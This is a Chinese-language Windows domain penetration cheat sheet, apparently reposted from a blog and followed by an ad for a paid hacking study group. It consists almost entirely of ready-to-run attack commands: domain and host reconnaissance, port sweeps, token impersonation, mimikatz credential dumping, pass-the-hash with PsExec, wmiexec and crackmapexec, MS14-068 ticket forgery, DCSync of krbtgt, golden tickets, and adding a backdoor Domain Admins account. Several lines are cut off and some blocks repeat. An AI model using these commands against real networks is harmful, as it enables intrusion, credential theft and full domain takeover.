query user || qwinsta 查看当前在线用户
net user 查看本机用户
net user /domain 查看域用户
net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多
net view /domain 查看有几个域
net view \\\\dc 查看 dc 域内共享文件
net group /domain 查看域里面的组
net group "domain admins" /domain 查看域管
net localgroup administrators /domain /这个也是查域管,是升级为域控时,本地账户也成为域管
net group "domain controllers" /domain 域控
net time /domain
net config workstation 当前登录域 - 计算机名 - 用户名
net use \\\\域控(如 pc.xx.com) password /user:xxx.com\username 相当于这个帐号登录域内主机,可访问资源
ipconfig
ping darkid.hack.com
nslookup darkid.hack.com
arp -a 查询通信
nbtscan 发现主机
nbtscan.exe -r 192.168.0.1/24
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1|find /i "ttl="
powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep StartAddress 192.168.1.0 -En
脚本下载地址:https://gallery.technet.microsoft.com/scriptcenter/Invoke-TSPingSweep-b71f1b9b
#针对单个 IP 的多个端口的扫描:
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.246.44",$_)) "Port $_ is open!"}
2>$null
#针对某 IP 段中单个端口的扫描:
foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}
#针对某 IP 段 & 多个端口的扫描器
1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$
使用 msf 进行反弹 shell 进行内网渗透时,通过 msf 自带的扫描模块进行快速扫描。
#主机存活探测:
auxiliary/scanner/discovery/arp_sweep ARP 扫描
auxiliary/scanner/discovery/udp_sweep UDP 扫描
auxiliary/scanner/netbios/nbname NETBIOS 扫描
auxiliary/scanner/snmp/snmp_enum SNMP 扫描
auxiliary/scanner/smb/smb_version SMB 扫描
#端口扫描:
auxiliary/scanner/portscan/ack TCP ACK 端口扫描
auxiliary/scanner/portscan/ftpbounce FTP bounce 端口扫描
auxiliary/scanner/portscan/syn SYN 端口扫描
auxiliary/scanner/portscan/tcp TCP 端口扫描
auxiliary/scanner/portscan/xmas TCP XMas 端口扫描
net time #查询域中的时间,会请求域控
net config workstation #查看当前工作环境
nltest /dclist:域后缀 #查询域控
powershell.exe -exec bypass -Command "Import-Module ./Invoke-TSPingSweep.ps1;Invoke-TSPingSweep StartAddress 192.168.1.0 -En
脚本下载地址:https://gallery.technet.microsoft.com/scriptcenter/Invoke-TSPingSweep-b71f1b9b
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.246.44",$_)) "Port $_ is open!"}
foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}
auxiliary/scanner/discovery/arp_sweep ARP 扫描
auxiliary/scanner/discovery/udp_sweep UDP 扫描
auxiliary/scanner/netbios/nbname NETBIOS 扫描
auxiliary/scanner/snmp/snmp_enum SNMP 扫描
auxiliary/scanner/smb/smb_version SMB 扫描
auxiliary/scanner/portscan/ack TCP ACK 端口扫描
auxiliary/scanner/portscan/ftpbounce FTP bounce 端口扫描
auxiliary/scanner/portscan/syn SYN 端口扫描
auxiliary/scanner/portscan/tcp TCP 端口扫描
auxiliary/scanner/portscan/xmas TCP XMas 端口扫描
incognito.exe execute -c "完整的 Token 名" cmd.exe
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe
use incognito #加载 incognito
list_tokens -u #列出 AccessToken
getuid #查看当前 token
impersonate_token "NT AUTHORITY\SYSTEM" #模拟 system 用户,getsystem 命令即实现了该命令。如果要模拟其他用户,将 token 名改为其他用户即
steal_token 1252 #从进程窃取 token
getsystem #提升至 system 权限
rev2self #返回到之前的 AccessToken 权限
privilege::debug
sekurlsa::logonpasswords
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt
privilege::debug
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:32ed87bdb5fdc5e9cba88547376818d4
PsExec64.exe /accepteula /s \\192.168.0.123 -u Administrator -p 123456cmd
PsExec.exe /accepteula /s \\192.168.0.141 -u Administrator -p 123456 cmd /c "ipconfig"
-accepteula 第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
-s 以 System 权限运行远程进程,如果不用这个参数,就会获得一个对应用户权限的 shell直接直接执行回显
-u 域\用户名
-p 密码
psexec -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 ./[email protected]
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 ./[email protected]
use exploit/windows/smb/psexec
set SMBUser Administrator
set rhosts 192.168.0.141
set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
run
crackmapexec smb 192.168.0.0/24 -u administrator -H 32ed87bdb5fdc5e9cba88547376818d4
对 192.168.9.0/24 C 段进行批量 pass the hash
wmic /node:192.168.0.123 /user:administrator /password:123456 process call create "cmd.exe /c ipconfig > c:\ip.txt"
net use \\192.168.0.123\ipc$ "123456" /user:administrator
type \\192.168.0.123\c$\ip.txt
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 [email protected] "whoami
python3 wmiexec.py administrator:[email protected]
wmic /node:192.168.7.7 /user:administrator /password:123456 PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowT
wmic /node:192.168.0.123 /user:administrator /password:123456 RDTOGGLE WHERE ServerName='计算机名' call SetAllowTSConnections 1
wmic /node:192.168.0.123 /user:administrator /password:123456 process call create 'cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentContro
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
wmic /node:192.168.0.141 /user:administrator /password:123456 process call create "shutdown.exe -r -f -t 0"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt
ms14-068.exe -u [email protected] -p 123456 -s S-1-5-21-3439616436-2844000184-3841763578-1105 -d 08server-ad.moonhack.com,
ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址
使用 mimikatz 清空之前缓存的凭证,导入伪造的凭证:
mimikatz # kerberos::purge //清空票据
mimikatz # kerberos::ptc 票据文件地址
net user moonsec123 Qwe123... /add /domain
net group "Domain Admins" moonsec123 /add /domain
mimikatz(commandline) # privilege::debug
mimikatz(commandline) # lsadump::dcsync /domain:moonhack.com /all /csv
或 lsadump::lsa /inject
mimikatz(commandline) # lsadump::dcsync /domain:moonhack.com /user:krbtgt
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:moonsec.fbi /all /csv" "exit">loghash.txt
mimikatz.exe "kerberos::golden /admin:system /domain:moonhack.com /sid:S-1-5-21-3439616436-2844000184-3841763578 /krbtgt:4c1d576
mimikatz # kerberos::purge
mimikatz # kerberos::ptt C:\Users\test\ticket.kirbi
dir \\08server1.moonhack.com\c$
tgt::ask /user:administrator /domain:moonsec.fbi /ntlm:42e2656ec24331269f82160ff5962387
// tgt::ask /user:用户名 /domain:域名 /ntlm:NTLM Hash
kerberos::ptt [email protected][email protected]
原文地址:见阅读原文
作者:Darkid-98
知识星球渗透知识库2022年成绩
已持续运营3年多,欢迎师傅们加入分享各种干货资源
知识星球渗透知识库(HACK之道)
汇集最全、最新的安全知识库,内容不限于红队攻防实战、内网渗透、代码审计、社工、安卓逆向、CTF比赛技巧、安全运维、应急响应、等保、企业安全建设、安全运营、漏洞复现、POC/EXP等技术干货。
PS:加入星球后不满意,三天内可退款,感兴趣的师傅扫码加入。
一年仅需要79元!